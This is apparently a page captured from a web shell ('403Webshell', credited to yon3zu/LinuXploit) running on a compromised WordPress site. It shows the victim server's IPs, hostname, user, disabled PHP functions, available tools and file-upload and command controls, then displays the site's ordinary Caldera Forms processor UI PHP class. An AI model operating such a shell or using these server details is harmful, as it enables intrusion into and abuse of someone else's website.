403Webshell
Server IP : 172.67.216.182  /  Your IP : 162.158.189.116
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/coircraft.com/wp-content/plugins/caldera-forms/processors/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/coircraft.com/wp-content/plugins/caldera-forms/processors/classes/ui.php
<?php
/**
 * Create markup for add-on config fields.
 *
 * @package Caldera_Forms
 * @author    Josh Pollock <[email protected]>
 * @license   GPL-2.0+
 * @link
 * @copyright 2015 CalderaWP LLC
 */
class Caldera_Forms_Processor_UI {

	/**
	 * Output field markup form an array fo field args
	 *
	 * @since 1.3.0
	 *
	 * @param array $fields Array of args to pass to self::config_field()
	 * @param null|string|int Optional. If null, all fields (except those with print args set to false will be printed). Can be used to print a group of fields based on the value of the print arg.
	 *
	 * @return bool|string The Markup or false if invalid.
	 */
	public static function config_fields( $fields, $print_group = null ) {
		$out = '';
		if ( ! empty( $fields ) && is_array( $fields ) ) {
			foreach( $fields as $args ) {
				if ( ! empty( $args ) ) {
					if ( isset( $args[ 'print' ] ) && false ==  $args[ 'print' ] ){
						continue;
					}

					if ( ! is_null( $print_group ) ) {
						if ( isset( $args[ 'print' ]  ) || $print_group != $args[ 'print' ] ) {
							continue;

						}

					}

					$out .= self::config_field( $args );
				}

			}

		}

 		return $out;

	}

	/**
	 * Create markup for a processor config field.
	 *
	 * @param array $args {
	 *     An array of arguments.
	 *
	 *     @type string $id Field ID (REQUIRED)
	 *     @type string $label Label for field (REQUIRED)
	 *     @type bool $magic If field is magic tag enabled. Default is true.
	 *     @type bool $block Use block style, Default is true
	 *     @type string $type Field type. Default is "text". Options: simple|checkbox|advanced|dropdown
	 *     @type array|string $extra_class Additional classes to apply.
	 *     @type string $desc Extra description to add to markup.
	 *     @type bool|string|array $allow_types Type(s) of fields that are allowed to bind to this or false to allow all.
	 *     @type bool|string|array $exclude Type(s) of fields that are NOT allowed to bind to this or false to not exclude any.
	 *     @type bool $desc_escaped Whether description is already escaped or not. Default is false. If false, description will be passed through esc_html() which is bad if HTML is in description. If true, it is not, which may be bad if you are passing potentially unsafe strings, like translation strings.
	 * }
	 *
	 * @return string|void HTML markup if input is valid. Void if not.
  	 */
	public static function config_field( $args ) {
		if ( ! is_array( $args ) || ! isset( $args[ 'id' ] ) ) {
			return;

		}

		$defaults = array(
			'label' => '',
			'magic' => true,
			'block' => true,
			'type'  => 'text',
			'extra_classes' => array(),
			'required' => false,
			'desc' => false,
			'allow_types' => false,
			'exclude' => false,
			'print' => true,
			'desc_escaped' => false
		);

		$args = wp_parse_args( $args, $defaults );

		if( 'hidden' != 'type' &&  ! isset( $args[ 'label' ] ) )  {
			return;

		}

		/**
		 * Filter arguments for field markup
		 *
		 * @since 1.3.0
		 *
		 * @param array $args
		 */
		$args = apply_filters( 'caldera_forms_addon_config_field_args', $args );

		$input_type = $args[ 'type' ];

		if ( 'checkbox' == $args[ 'type'] ) {
			$args[ 'block' ] = false;
			$args[ 'magic' ] = false;
			$input_type = 'checkbox';
		}

		if( 'dropdown' == $args[ 'type' ] ){
			$args[ 'magic' ] = false;

		}

		if ( is_string( $args[ 'extra_classes']) ) {
			$args[ 'extra_classes' ] = array( $args[ 'extra_classes' ] );
		}

		$classes = $args[ 'extra_classes' ];

		if( $args[ 'block' ] ) {
			$classes[] = 'block-input';
		}

		if ( $args[ 'magic'] ) {
			$classes[] = 'magic-tag-enabled';
		}

		if ( $args[ 'required' ] ) {
			$classes[] = 'required';
		}

		$classes[] = $args['id'];

		$args[ 'extra_classes' ][] = 'field-config';

		/**
		 * Filter classes added to UI field
		 *
		 * @since 1.3.5.3
		 *
		 * @param array $classes Array of classes. Will be imploded
		 * @param string $id Field ID
		 * @param array $args field args
		 * 
		 */
		$classes = implode( ' ', apply_filters( 'caldera_forms_ui_field_classes', $classes, $args[ 'id' ], $args ) );

		$id = trim( $args['id'] );

		$desc = $has_desc = false;
		if ( $args[ 'desc' ] ) {
			$has_desc = true;
			if( ! $args[ 'desc_escaped'] ){
				$desc = esc_html( $args[ 'desc' ] );
			}else{
				$desc = $args[ 'desc' ];
			}
			$desc = sprintf( '<p class="description" id="%s">%s</p>', esc_attr( self::description_id( $id ) ), $desc  );
		}

		$allow_types = '';
		if ( $args[ 'allow_types' ] ) {
			$input_type = 'advanced';
		}

		$required = $args[ 'required' ];
		if ( $required ) {
			$required = 'required';
		}

		if ( 'hidden' != $args[ 'type' ] ) {
			$field = sprintf('
		<div class="caldera-config-group" id="%s">
			<label for="%s" id="%s">
				%s
			</label>
			<div class="%s">
				%s
			</div>
			%s
		</div>',
				esc_attr( $id . '-wrap'),
				esc_attr( $id ),
				esc_attr( self::label_id( $id ) ),
				$args[ 'label' ],
				esc_attr( 'caldera-config-field ' . $id . '-wrap' ),
				self::input( $input_type, $args, $id, $classes, $required, $has_desc ),
				$desc
			);
		} else {
			$field = self::input( 'hidden', $args, $id, $classes, $required, false );
		}

		/**
		 * Modify HTML for the input field group in processor UI
		 *
		 * @since 1.3.5.3
		 *
		 * @param string $input_type ID attribute
		 * @param string $type The type of input. This is NOT The input type. Options are simple|checkbox|advanced|dropdown
		 * @param array $args Field args
		 */
		return apply_filters( 'caldera_forms_processor_ui_input_group_html', $field, $input_type, $id, $args );

	}

	/**
	 * Make ID for a label element
	 *
	 * @since 1.3.5.3
	 *
	 * @param string $id ID attribute of element being labeled.
	 *
	 * @return string
	 */
	protected static function label_id( $id ){
		return $id . '-label';
	}

	/**
	 * Make ID for a description element
	 *
	 * @since 1.3.5.3
	 *
	 * @param string $id ID attribute of element being described.
	 *
	 * @return string
	 */
	protected static function description_id( $id ){
		return $id . '-desc';
	}

	/**
	 * Create the input for proccesor config field.
	 *
	 * @since 1.3.0
	 *
	 * @param string $type The type of input. This is NOT The input type. Options are simple|checkbox|advanced|dropdown
	 * @param array $args Field args
	 * @param string $id ID attribute
	 * @param string $classes Class attribute.
	 * @param bool|string $required If is required or not
	 * @param bool $has_desc Does this input have a description?
	 *
	 * @return string HTML markup for input
	 */
	public static function input( $type, $args, $id, $classes, $required, $has_desc ) {

		/**
		 * Use to make custom HTML for admin input fields
		 *
		 * By returning a string, rest of this method -- Caldera_Forms_Processor_UI::input() -- is skipped
		 *
		 * @since 1.4.0
		 *
		 * @param string|null $field_html HTML to use instead of default, else null to let method to its thing.
		 * @param array $args Field args
		 * @param string $id ID attribute
		 * @param string $classes Class attribute.
		 * @param bool|string $required If is required or not
		 * @param bool $has_desc Does this input have a description?
		 */
		$field_html = apply_filters( 'caldera_forms_processor_ui_input_pre_html', null, $type, $args, $id, $classes, $required, $has_desc );
		if( is_string( $field_html ) ){
			return $field_html;

		}

		$field = '';
		$aria = sprintf( 'aria-labelledby="%s"', self::label_id( $id ) );
		if( $has_desc ){
			$aria .= sprintf( ' aria-describedby="%s"', self::description_id( $id ) );
		}

		switch( $type ) {
			case 'checkbox' == $type :
				$field = sprintf( '<input type="%1s" class="%2s" id="%3s" name="{{_name}}[%4s]"  %s >',
					$args[ 'type' ],
					$classes,
					esc_attr( $id ),
					esc_attr( $id ),
					sprintf( '{{#if %s}}checked{{/if}}', esc_attr( $id ) ),
					$aria
				);
				break;
			case 'advanced' :
				if ( $required ) {
					$required = "true";
				}else{
					$required = "false";
				}

				if ( is_string( $args[ 'allow_types' ] ) ) {
					$allow_types = $args[ 'allow_types' ] ;
				}elseif ( is_array( $args[ 'allow_types' ] ) ){
					$allow_types = implode( ',', $args[ 'allow_types' ] );
				}else{
					$allow_types = 'all';
				}

				if ( is_string( $args[ 'exclude' ] ) ) {
					$excludes = $args[ 'exclude' ] ;
				}elseif ( is_array( $args[ 'exclude' ] ) ){
					$excludes = implode( ',', $args[ 'exclude' ] );
				}else{
					$excludes = 'all';
				}

				$field = sprintf( '{{{_field slug="%1s" type="%2s" exclude="%3s" required="%4s"}}}',
					esc_attr( $id ),
					$allow_types,
					$excludes,
					$required
				);
			break;
			case 'dropdown' :
				if ( isset( $args[ 'options' ] ) ){
					foreach( $args[ 'options' ] as $value => $label ) {
						$options[] = sprintf( '<option value="%1s" {{#is %2s value="%3s"}}selected{{/is}}>%4s</option>',
							esc_attr( $value ),
							esc_attr( $id ),
							esc_attr( $value ),
							esc_html( $label )
						);
					}

					$field = sprintf( '<select class="%s" id="%s" name="{{_name}}[%s]" %s>%s,</select>',
						$classes,
						esc_attr( $id ),
						esc_attr( $id ),
						$aria,
						implode( "/n", $options )
					);
				}
				break;
			case 'hidden' :
				$field = sprintf( '<input type="hidden" class="%s" id="%s" name="{{_name}}[%s]" value="%s">',
					$classes,
					esc_attr( $id ),
					esc_attr( $id ),
					'{{' . esc_attr( $id ) . '}}'
				);
				break;
			default :
				$field = sprintf( '<input type="%1s" class="%2s" id="%3s" name="{{_name}}[%4s]" value="%5s" %6s>',
					$args[ 'type' ],
					$classes,
					esc_attr( $id ),
					esc_attr( $id ),
					'{{' . esc_attr( $id ) . '}}',
					$required
				);
			break;
		}

		/**
		 * Modify HTML for the input in processor UI
		 *
		 * @since 1.3.5.3
		 *
		 *
		 * @param string $id ID attribute
		 * @param string $type The type of input. This is NOT The input type. Options are simple|checkbox|advanced|dropdown
		 * @param array $args Field args
		 */
		return apply_filters( 'caldera_forms_processor_ui_input_html', $field, $type, $id, $args );

	}

	/**
	 * Helper function to place a notice in processor config, if SSL required and not in use.
	 *
	 * @since 1.3.0
	 *
	 * @param string $name Name of add-on.
	 *
	 * @return string
	 */
	public static function ssl_notice( $name ) {
		if ( is_ssl() ) {
			return;
		}

		return sprintf( '<div class="error"><p>%1s</p></div>', __( sprintf( '%1s requires a valid SSL certificate. It will only function in test mode unless SSL/HTTPS is used. Your site does not appear to be using the secure HTTPS protocol.', $name ), 'caldera-forms' ) );

	}


}

Youez - 2016 - github.com/yon3zu
LinuXploit